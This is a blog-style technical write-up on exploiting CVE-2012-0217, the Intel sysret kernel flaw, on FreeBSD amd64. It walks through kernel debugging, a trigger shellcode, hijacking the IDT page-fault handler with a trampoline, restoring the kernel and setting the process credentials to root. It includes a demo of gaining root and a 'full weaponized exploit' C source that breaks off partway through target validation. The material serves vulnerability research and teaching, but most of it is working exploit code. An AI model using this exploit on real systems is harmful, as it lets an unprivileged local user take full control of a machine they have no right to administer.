CVE-2012-0217: Intel's sysret Kernel Privilege Escalation (on FreeBSD)
CVE-2012-0217 was reported by Rafal Wojtczuk. Ironically, the same issue had already been fixed in Linux in 2006 (see CVE-2006-0744) without receiving much attention.
It is quite an interesting vulnerability in many respects. Among them, and thanks to its hardware basis, it impacts many operating systems. For instance, as long as they run on an Intel processor in long mode (obviously), FreeBSD, NetBSD, Solaris, Xen and Microsoft Windows have been reported to be vulnerable. This therefore gives us quite an incentive to develop an exploit ;).
If you haven’t yet read Xen’s blog post The Intel SYSRET privilege escalation, please do, because we won’t go into much detail about the vulnerability itself.
Without further delay, let’s dig right into the FreeBSD exploitation!
Overview
While developing an exploit, it helps to take mental note of, or write down, a TODO list and/or roadmap to a successful exploitation. Here is one, sorted in chronological order of exploitation:
- A way to debug the kernel! (You really think one shot is all it takes? ;) )
- Information gathering
- Code to trigger the vulnerability
- Getting arbitrary code execution
- Keeping the kernel stable
- Recovering from the general protection fault exception (#GP)
- Privilege escalation
- Giving back a shellcode to the user
- (3) Profit ;)
Of course this is not necessarily the order you follow when trying to come up with ideas to solve them. You don’t always (often?) even have a full roadmap until you actually come up with random ideas, ideas which slowly gather, start to make sense and flow together.
Kernel debugging
This is one of the most important items. Having a good debugging environment goes a long way toward a successful exploitation.
Many configurations could work; in this case, we run and debug the target OS (FreeBSD) under VMware Fusion on Mac OS X.
Indeed, VMware provides an easy way to debug the guest OS through a debug stub. Enabling it is easy: you just need to edit the .vmx file you’ll find inside your VMware VM (Right Click->Show Package Contents), and add the following line:
debugStub.listen.guest64 = "TRUE"
With this magic configuration line, VMware listens on port 8864, and you are now able to debug your VM’s OS using gdb’s target command:
(gdb) target remote localhost:8864
But for this to be useful, we need to configure and cross-compile GDB for the FreeBSD target environment (amd64-marcel-freebsd), so that we can load the FreeBSD kernel symbols into gdb. This requires gettext, gmp, and libelf, which you can install with MacPorts.
As an example, using gdb 7.4.1:
% sudo port install gettext gmp libelf
[...]
% curl -O http://ftp.gnu.org/gnu/gdb/gdb-7.4.1.tar.bz2
[...]
% tar xvjf gdb-7.4.1.tar.bz2
[...]
% cd gdb-7.4.1
gdb-7.4.1 % CFLAGS=-I/opt/local/include ./configure --prefix=/opt/local --program-suffix=-amd64-marcel-freebsd --target=amd64-marcel-freebsd
[...]
gdb-7.4.1 % make
[...]
gdb-7.4.1 % make install
And finally, just copy FreeBSD’s /usr/src and /boot/kernel/ directories to Mac OS X.
And voila, you’re set!
% ls
kernel/ usr/
% gdb-amd64-marcel-freebsd -q -tui kernel/kernel
┌──Register group: general─────────────────────────────────────────────┐
│rax 0x0 0 │
│rbx 0x0 0 │
│rcx 0x100b 4107 │
│rdx 0x1008 4104 │
│rsi 0xffffff80001f6b54 -549753754796 │
│rdi 0x1008 4104 │
│rbp 0xffffff80001f6b30 0xffffff80001f6b30 │
│rsp 0xffffff80001f6b30 0xffffff80001f6b30 │
│r8 0x0 0 │
│r9 0x0 0 │
│r10 0x2 2 │
│r11 0xffffffff8022fdb0 -2145190480 │
│r12 0xffffff0002286200 -1099475426816 │
│r13 0xffffff0002286228 -1099475426776 │
┌──/usr/src/sys/amd64/acpica/acpi_machdep.c─────────────────────────┐
│96 { │
│97 return (0); │
│98 } │
│99 │
│100 void │
│101 acpi_cpu_c1() │
│102 { │
│103 __asm __volatile("sti; hlt"); │
>│104 } │
│105 │
│106 /* │
│107 * Support for mapping ACPI tables during early boot. Curr│
│108 * uses the crashdump map to map each table. However, the │
│109 * map is created in pmap_bootstrap() right after the direc│
└───────────────────────────────────────────────────────────────────┘
remote Thread 1 In: acpi_cpu_c1 Line: 104 PC: 0xffffffff8092d1d6
Reading symbols from kernel/kernel...done.
(gdb) target remote localhost:8864
Remote debugging using localhost:8864
acpi_cpu_c1 () at /usr/src/sys/amd64/acpica/acpi_machdep.c:104
(gdb)
NB: you can change the -tui layout by pressing ctrl+x 2 multiple times.
One warning though: you can’t easily single-step through everything. For instance, if you single-step through the function Xfast_syscall [1], the code
cli
testl $PCB_FULL_IRET,PCB_FLAGS(%rax)
would detect that it needs a full iret and won’t use the sysret instruction.
The trick is therefore to set your breakpoints directly at the #GP and/or double fault handlers (resp. Xprot() [2] and Xdblfault() [3]), which are triggered right after the sysret instruction executes. From there, you won’t have trouble single-stepping, and you’ll even see the page fault trigger once the kernel tries to access some gs:data (we’ll see why soon enough).
Information gathering
During exploitation, we need a few kernel symbol addresses. Under FreeBSD we’re in luck: the kldsym() function provides an easy way to look up symbols, as shown by the following get_symaddr() function.
u_long get_symaddr(char *symname)
{
struct kld_sym_lookup ksym;
ksym.version = sizeof (ksym);
ksym.symname = symname;
if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
perror("kldsym");
exit(1);
}
printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
return ksym.symvalue;
}
Vulnerability Triggering
Triggering the vulnerability is easy:
- Allocate a page just before the non-canonical address boundary 0x0000800000000000
- Call an arbitrary syscall using a syscall instruction placed right before the non-canonical address boundary
When the fast syscall handler restores the user’s registers and executes sysret, it tries to return to the “next instruction” at 0x0000800000000000. On Intel processors, a #GP is then triggered while still in kernel mode. Furthermore, an exception frame is pushed to the stack, which now happens to be the userland’s stack (rsp has already been restored). Thus, we can trigger a kernel write to a location which is user controlled!
Hence, the following triggering code:
uint64_t pagesize = getpagesize();
uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
area = mmap(area, pagesize,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
if (area == MAP_FAILED) {
perror("mmap (trigger)");
exit(1);
}
// Copy the trigger code at the end of the page
// such that the syscall instruction is at its
// boundary
char triggercode[] =
"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
"\x0f\x05"; // syscall
uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
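To make the boundary concrete, here is a minimal sketch of the canonical-address rule, assuming 48-bit virtual addresses as on the processors discussed here. The helper names `is_canonical` and `next_rip_after` are illustrative only and are not part of the exploit.

```c
#include <stdint.h>

/* With 48-bit virtual addresses, an address is canonical when
 * bits 63..47 are all equal (all zeros or all ones). */
static int is_canonical(uint64_t addr)
{
    uint64_t top = addr >> 47;            /* the 17 bits 63..47 */
    return top == 0 || top == 0x1FFFF;
}

/* Address of the instruction following one of `len` bytes at `insn`. */
static uint64_t next_rip_after(uint64_t insn, uint64_t len)
{
    return insn + len;
}
```

With the 2-byte syscall instruction occupying the last two bytes of the page, `next_rip_after((1ULL << 47) - 2, 2)` is 0x0000800000000000, for which `is_canonical` returns 0, while the last user byte 0x00007fffffffffff is still canonical.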
The question now is, what do we set rsp to?
Follow the white rabbit…
Arbitrary code execution
There are two outcomes given a target rsp:
- if rsp can’t be written to, a double fault is triggered (Xdblfault() [3]) and the exception frame is pushed to a special stack
- otherwise a #GP is triggered (Xprot() [2]) and the exception frame is pushed to [rsp]
In the latter case, the trouble is (or is it?)… The #GP triggers a page fault (Xpage() [4]). Let’s see why.
IDTVEC(prot)
subq $TF_ERR,%rsp
movl $T_PROTFLT,TF_TRAPNO(%rsp) [1]
movq $0,TF_ADDR(%rsp) [2]
movq %rdi,TF_RDI(%rsp) /* free up a GP register */ [3]
leaq doreti_iret(%rip),%rdi
cmpq %rdi,TF_RIP(%rsp)
je 1f /* kernel but with user gsbase!! */
testb $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */ [4]
jz 2f /* already running with kernel GS.base */
1: swapgs
2: movq PCPU(CURPCB),%rdi [5]
[4] sets the Z flag because we come from the kernel (while executing sysret) and we therefore skip the swapgs instruction. But in this particular chain of events, GS is in fact the user’s GS.base! Indeed, it was restored just before calling sysret… Hence, accessing gs:data at [5] triggers a page fault (Xpage() [4]).
If we don’t do anything, we’ll eventually double fault, triple fault, etc. and crash miserably.
We therefore need a way:
- to recover from the #GP
- to clean any mess we did/overwrote
Both could be solved if we can get arbitrary code execution by the time we reach [5]. (NB: this is not mandatory; we could get the code execution later down the fault trigger chain.)
So… here is the idea: wouldn’t it be nice if we could overwrite the page fault handler’s address and therefore get code execution when [5] triggers the #PF?
Yes indeed, and that’s how we’re going to exploit it :-)
First a few structures for reference:
Gate descriptor:
+0: Target Offset[15:0] | Target Selector
+4: Some stuff | Target Offset[31:16]
+8: Target Offset[63:32]
+12: Some more stuff
and from include/frame.h:
struct trapframe {
register_t tf_rdi;
register_t tf_rsi;
register_t tf_rdx;
register_t tf_rcx;
register_t tf_r8;
register_t tf_r9;
register_t tf_rax;
register_t tf_rbx;
register_t tf_rbp;
register_t tf_r10;
register_t tf_r11;
register_t tf_r12;
register_t tf_r13;
register_t tf_r14;
register_t tf_r15;
uint32_t tf_trapno;
uint16_t tf_fs;
uint16_t tf_gs;
register_t tf_addr;
uint32_t tf_flags;
uint16_t tf_es;
uint16_t tf_ds;
/* below portion defined in hardware */
register_t tf_err;
register_t tf_rip;
register_t tf_cs;
register_t tf_rflags;
register_t tf_rsp;
register_t tf_ss;
};
When the exception is triggered, the hardware pushes ss, rsp, rflags, cs, rip and err.
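To see where each trapframe field lands relative to the stack pointer, the layout can be checked with offsetof. The sketch below uses a local replica of the struct shown above (`trapframe_sketch` and `reg64_t` are illustrative names, not the kernel's), and assumes the hardware aligns rsp to 16 bytes before pushing its six 64-bit words, so that the frame ends exactly at the aligned rsp.

```c
#include <stddef.h>
#include <stdint.h>

typedef uint64_t reg64_t;   /* stand-in for the kernel's register_t */

struct trapframe_sketch {
    reg64_t  tf_rdi, tf_rsi, tf_rdx, tf_rcx, tf_r8, tf_r9, tf_rax, tf_rbx,
             tf_rbp, tf_r10, tf_r11, tf_r12, tf_r13, tf_r14, tf_r15;
    uint32_t tf_trapno;
    uint16_t tf_fs, tf_gs;
    reg64_t  tf_addr;
    uint32_t tf_flags;
    uint16_t tf_es, tf_ds;
    /* portion pushed by the hardware */
    reg64_t  tf_err, tf_rip, tf_cs, tf_rflags, tf_rsp, tf_ss;
};

/* Address of a field, given the 16-byte-aligned rsp at exception time:
 * the whole frame sits just below that rsp. */
static uint64_t field_address(uint64_t aligned_rsp, size_t field_offset)
{
    return aligned_rsp - sizeof(struct trapframe_sketch) + field_offset;
}
```

Under these assumptions the struct is 192 bytes, tf_rdi and tf_addr (offsets 0 and 128) fall on 16-byte boundaries, and tf_trapno (offset 120) falls 8 bytes past one.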
We can see that [1], [2] and [3] write to the stack.
- [3] is fully user-controlled through rdi, so we could try to align rsp such that [3] overwrites the #PF’s offset address. The trouble is… rsp is automatically 16-byte aligned when an exception is triggered. We can therefore only overwrite the 32 LSBs of the offset address (check how rdi is 16-byte aligned in this trapframe if you don’t understand why).
- [2] writes 0 to tf_addr, which is also 16-byte aligned. So no dice.
- That leaves us with [1], which writes T_PROTFLT (0x9) to tf_trapno, and tf_trapno is 16-byte aligned + 8! This enables us to set Target Offset[63:32] to 0x9.
Thus, if we set rsp to &idt[14] + 10*8 (to align tf_trapno with the #PF’s Target Offset[63:32]), we can set the #PF handler’s address to 0x9WWXXYYZZ.
Furthermore, WWXXYYZZ is known since we can get the #PF handler’s address through get_symaddr(). To get arbitrary code execution, the idea is therefore to set up trampoline code at 0x9WWXXYYZZ, which contains some setup code and a jump to our kernel mode payload (pointed to by rax in the following code).
*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
char trampolinecode[] =
"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
"\xff\xe0"; // jmp rax
uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
size_t trampoline_allocsize = pagesize;
// We round the address to the PAGESIZE for the allocation
// Not enough space for the trampoline code ?
if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
trampoline_allocsize += pagesize;
if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
{
perror("mmap (trampoline)");
exit(1);
}
memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
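The 0x9WWXXYYZZ arithmetic can be checked on an ordinary byte buffer. The sketch below models a gate descriptor following the layout given earlier (Offset[15:0] at +0, Offset[31:16] at +6, Offset[63:32] at +8); `raw_gate_t` and the three helpers are illustrative names that only operate on a local array, not on a real IDT.

```c
#include <stdint.h>

/* A 16-byte long-mode gate descriptor, viewed as raw bytes. */
typedef struct { uint8_t b[16]; } raw_gate_t;

/* Scatter a 64-bit handler address into the three offset fields. */
static void gate_set_offset(raw_gate_t *g, uint64_t addr)
{
    g->b[0] = (uint8_t)(addr);                 /* Offset[15:0]  */
    g->b[1] = (uint8_t)(addr >> 8);
    g->b[6] = (uint8_t)(addr >> 16);           /* Offset[31:16] */
    g->b[7] = (uint8_t)(addr >> 24);
    for (int i = 0; i < 4; i++)                /* Offset[63:32] */
        g->b[8 + i] = (uint8_t)(addr >> (32 + 8 * i));
}

/* Gather the three offset fields back into one 64-bit address. */
static uint64_t gate_get_offset(const raw_gate_t *g)
{
    uint64_t addr = (uint64_t)g->b[0]
                  | (uint64_t)g->b[1] << 8
                  | (uint64_t)g->b[6] << 16
                  | (uint64_t)g->b[7] << 24;
    for (int i = 0; i < 4; i++)
        addr |= (uint64_t)g->b[8 + i] << (32 + 8 * i);
    return addr;
}

/* Model a little-endian 32-bit store landing on Offset[63:32]. */
static void gate_store_high32(raw_gate_t *g, uint32_t value)
{
    for (int i = 0; i < 4; i++)
        g->b[8 + i] = (uint8_t)(value >> (8 * i));
}
```

Taking the Xpage address from the demo output, 0xffffffff80b03240, a 32-bit store of 0x9 at +8 turns the decoded offset into 0x980b03240, which is a canonical user-space address.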
Keeping the kernel stable
Getting a root shell and crashing after 1us is not fun, is it? We’d better restore whatever we overwrote in kernel space while trying to achieve code execution…
Let’s summarize what we smashed with rsp initialized to &idt[14] + 10*8, i.e. &idt[19]:
- The #GP exception frame writes 6*64bit registers, i.e. it overwrites idt[18], idt[17] and idt[16]
- tf_addr overwrites the 64 LSBs of idt[15]
- tf_trapno overwrites the Target Offset[63:32] field of idt[14]
- rdi overwrites the 64 LSBs of idt[7]
- The #PF exception frame overwrites idt[6], idt[5] and idt[4]
Thus overall, the IDT’s entries 4, 5, 6, 7, 14, 15, 16, 17, and 18 need to be restored and we should be safe.
struct gate_descriptor *idt = sidt();
setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
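The list of entries to restore follows from plain index arithmetic on byte offsets from the IDT base. The sketch below redoes that bookkeeping; the constants assume 16-byte gates, a 48-byte hardware frame and the 192-byte trapframe shown earlier, and the helper names are illustrative.

```c
#include <stdint.h>

enum { GATE_SIZE = 16, HW_FRAME_SIZE = 6 * 8, TRAPFRAME_SIZE = 192 };

/* Index of the gate containing byte offset `off` from the IDT base. */
static unsigned gate_index(uint64_t off)
{
    return (unsigned)(off / GATE_SIZE);
}

/* Byte offset of the initial rsp, i.e. &idt[14] + 10*8. */
static uint64_t initial_rsp_offset(void)
{
    return 14 * GATE_SIZE + 10 * 8;
}

/* Lowest byte written by a hardware frame pushed at `rsp_off`. */
static uint64_t hw_frame_start(uint64_t rsp_off)
{
    return rsp_off - HW_FRAME_SIZE;
}

/* Base of the trapframe whose hardware part ends at `rsp_off`. */
static uint64_t trapframe_base(uint64_t rsp_off)
{
    return rsp_off - TRAPFRAME_SIZE;
}
```

Starting from offset 304 (gate 19), the #GP hardware frame covers offsets 256..303 (gates 16 to 18) and the trapframe base is 112 (gate 7). tf_trapno at base+120 lands at byte 8 of gate 14, tf_addr at base+128 lands at the start of gate 15, and the #PF hardware frame pushed from offset 112 covers 64..111 (gates 4 to 6).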
Privilege escalation
This part is quite standard and easy: we just need to retrieve the address of the current user credentials struct and set the various IDs to 0 (root).
Knowing that the current thread struct’s address can be read from gs:0 under FreeBSD, this yields the following code.
struct thread *td;
struct ucred *cred;
// get the thread pointer
asm ("mov %%gs:0, %0" : "=r"(td));
// The Dark Knight Rises
cred = td->td_proc->p_ucred;
cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
cred->cr_groups[0] = 0;
Shellcode
Finally… We return to our userland shellcode using the sysret instruction.
// return to user mode to spawn the shell
asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
And the shellcode? What shellcode? :P
The user credentials struct is cached/shared among the user’s processes. Since we modified it, the caller’s shell will automagically inherit this privilege escalation.
Hence the following shellcode ;-)
void shellcode()
{
// Actually we dont really need to spawn a shell since we
// changed our whole cred struct.
// Just exit...
printf("[*] Got root!\n");
exit(0);
}
Demo
$ uname -a
FreeBSD FreeBSD 9.0 64bit 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(qwerty) gid=1001(qwerty) groups=1001(qwerty)
$ ls -l
total 24
-rwxr-xr-x 1 qwerty qwerty 11693 Jul 5 17:49 CVE-2012-0217
-rw-r--r-- 1 qwerty qwerty 10763 Jul 5 17:49 CVE-2012-0217.c
$ ./CVE-2012-0217
CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
[*] Retrieving host information...
[+] CPU: GenuineIntel
[+] sysname: FreeBSD
[+] release: 9.0-RELEASE
[+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
[+] machine: amd64
[*] Validating target OS and version...
[+] Vulnerable :-)
[*] Resolving kernel addresses...
[+] Resolved Xofl to 0xffffffff80b02e70
[+] Resolved Xbnd to 0xffffffff80b02ea0
[+] Resolved Xill to 0xffffffff80b02ed0
[+] Resolved Xdna to 0xffffffff80b02f00
[+] Resolved Xpage to 0xffffffff80b03240
[+] Resolved Xfpu to 0xffffffff80b02fc0
[+] Resolved Xalign to 0xffffffff80b03080
[+] Resolved Xmchk to 0xffffffff80b02f60
[+] Resolved Xxmm to 0xffffffff80b02ff0
[*] Setup...
[+] Trigger code...
[+] Trampoline code...
[*] Fire in the hole!
[*] Got root!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
Final words
The final exploit is quite stable: it recovers cleanly and exits back to the user’s shell. It works on both FreeBSD 8 and 9 (and probably 7) as-is with the stock kernels, without any need for special magic hardcoded values; but of course the environment could be hardened.
To conclude: the mandatory video :-)
And… That’s a wrap!
Hope you enjoyed it. Feel free to comment or discuss other exploitation paths.
[1] Xfast_syscall is defined in sys/amd64/amd64/exception.S
[2] Xprot is defined in sys/amd64/amd64/exception.S
[3] Xdblfault is defined in sys/amd64/amd64/exception.S
[4] Xpage is defined in sys/amd64/amd64/exception.S
The full weaponized exploit
also available on github
// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>
uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;
struct gate_descriptor * sidt()
{
struct region_descriptor idt;
asm ("sidt %0": "=m"(idt));
return (struct gate_descriptor*)idt.rd_base;
}
u_long get_symaddr(char *symname)
{
struct kld_sym_lookup ksym;
ksym.version = sizeof (ksym);
ksym.symname = symname;
if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
perror("kldsym");
exit(1);
}
printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
return ksym.symvalue;
}
// Code taken from amd64/amd64/machdep.c
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
struct gate_descriptor *ip;
ip = idt + idx;
ip->gd_looffset = func;
ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
ip->gd_ist = ist;
ip->gd_xx = 0;
ip->gd_type = typ;
ip->gd_dpl = dpl;
ip->gd_p = 1;
ip->gd_hioffset = func>>16;
}
void shellcode()
{
// Actually we dont really need to spawn a shell since we
// changed our whole cred struct.
// Just exit...
printf("[*] Got root!\n");
exit(0);
}
void kernelmodepayload()
{
struct thread *td;
struct ucred *cred;
// We need to restore/recover whatever we smashed
// We initialized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
// idt[18], idt[17] and idt[16]
// thus overall we have:
// - idt[18], idt[17] and idt[16] are trashed
// - tf_addr -> overwrites the 64bit-LSB of idt[15]
// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
// - rdi -> overwrites the 64bit-LSB of idt[7]
// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
struct gate_descriptor *idt = sidt();
setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
// get the thread pointer
asm ("mov %%gs:0, %0" : "=r"(td));
// The Dark Knight Rises
cred = td->td_proc->p_ucred;
cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
cred->cr_groups[0] = 0;
// return to user mode to spawn the shell
asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
}
#define TRIGGERCODESIZE 20
#define TRAMPOLINECODESIZE 18
void trigger()
{
printf("[*] Setup...\n");
// Allocate one page just before the non-canonical address
printf(" [+] Trigger code...\n");
uint64_t pagesize = getpagesize();
uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
area = mmap(area, pagesize,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
if (area == MAP_FAILED) {
perror("mmap (trigger)");
exit(1);
}
// Copy the trigger code at the end of the page
// such that the syscall instruction is at its
// boundary
char triggercode[] =
"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
"\x0f\x05"; // syscall
uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
// There are two outcomes given a target rsp:
// - if rsp can't be written to, a double fault is triggered
// (Xdblfault defined in sys/amd64/amd64/exception.S)
// and the exception frame is pushed to a special stack
// - otherwise a #GP is triggered
// (Xprot defined in sys/amd64/amd64/exception.S)
// and the exception frame is pushed to [rsp]
//
// In the latter case, trouble is... #GP triggers a page fault
// (Xpage):
// IDTVEC(prot)
// subq $TF_ERR,%rsp
// [1] movl $T_PROTFLT,TF_TRAPNO(%rsp)
// [2] movq $0,TF_ADDR(%rsp)
// [3] movq %rdi,TF_RDI(%rsp) /* free up a GP register */
// leaq doreti_iret(%rip),%rdi
// cmpq %rdi,TF_RIP(%rsp)
// je 1f /* kernel but with user gsbase!! */
// [4] testb $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
// jz 2f /* already running with kernel GS.base */
// 1: swapgs
// 2: movq PCPU(CURPCB),%rdi [5]
//
// [4] sets the Z flag because we come from the kernel (while executing sysret)
// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
// it was restored just before calling sysret...
// Thus, [5] triggers a pagefault while trying to access gs:data
// If we don't do anything we'll eventually double fault, triple fault etc. and crash
//
// We therefore need a way: (1) to recover from the GP, (2) to clean
// any mess we did. Both could be solved if we can get an arbitrary
// code execution by the time we reach [5] (NB: this is not mandatory, we could
// get the code execution later down the fault trigger chain)
//
// So... here is the idea: wouldn't it be nice if we could overwrite the
// page fault handler's address and therefore get code execution when [5]
// triggers the #PF?
//
// For reference:
// Gate descriptor:
// +0: Target Offset[15:0] | Target Selector
// +4: Some stuff | Target Offset[31:16]
// +8: Target Offset[63:32]
// +12: Stuff
//
// and from include/frame.h:
// struct trapframe {
// register_t tf_rdi;
// register_t tf_rsi;
// register_t tf_rdx;
// register_t tf_rcx;
// register_t tf_r8;
// register_t tf_r9;
// register_t tf_rax;
// register_t tf_rbx;
// register_t tf_rbp;
// register_t tf_r10;
// register_t tf_r11;
// register_t tf_r12;
// register_t tf_r13;
// register_t tf_r14;
// register_t tf_r15;
// uint32_t tf_trapno;
// uint16_t tf_fs;
// uint16_t tf_gs;
// register_t tf_addr;
// uint32_t tf_flags;
// uint16_t tf_es;
// uint16_t tf_ds;
// /* below portion defined in hardware */
// register_t tf_err;
// register_t tf_rip;
// register_t tf_cs;
// register_t tf_rflags;
// register_t tf_rsp;
// register_t tf_ss;
// };
//
// When the exception is triggered, the hardware pushes
// ss, rsp, rflags, cs, rip and err
//
// We can see that [1], [2] and [3] write to the stack
// [3] is fully user-controlled through rdi, so we could try to align
// rsp such that [3] overwrites the offset address
//
// The trouble is... rsp is 16byte aligned for exceptions. We can
// therefore only overwrite the first 32-LSB of the offset address
// (check how rdi is 16byte aligned in this trapframe)
//
// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
// and tf_trapno is 16byte aligned + 8!
// This enables us to set Target Offset[63:32] to 0x9
//
// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
// Hence, the #PF handler's address is now 0x9WWXXYYZZ
// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
// some setup and jump to our kernel mode code
printf(" [+] Trampoline code...\n");
char trampolinecode[] =
"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
"\xff\xe0"; // jmp rax
uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
size_t trampoline_allocsize = pagesize;
// We round the address to the PAGESIZE for the allocation
// Not enough space for the trampoline code ?
if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
trampoline_allocsize += pagesize;
if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
{
perror("mmap (trampoline)");
exit(1);
}
memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
// Call it
printf("[*] Fire in the hole!\n");
((void (*)())trigger_addr)();
}
typedef struct validtarget
{
char * sysname;
char * release;
char * machine;
} validtarget_t;
int validate_target(char * sysname, char * release, char * machine)
{
validtarget_t targets[] = {
{ "FreeBSD", "8.3-RELEASE", "amd64" },
{ "FreeBSD", "9.0-RELEASE", "amd64" },
{ 0, 0, 0 }
};
int found = 0;
int i = 0;
while (!found && targets[i].sysname) {
found = !strcmp(targets[i].sysname, sysname)
&& !strcmp(targets[i].release, release)
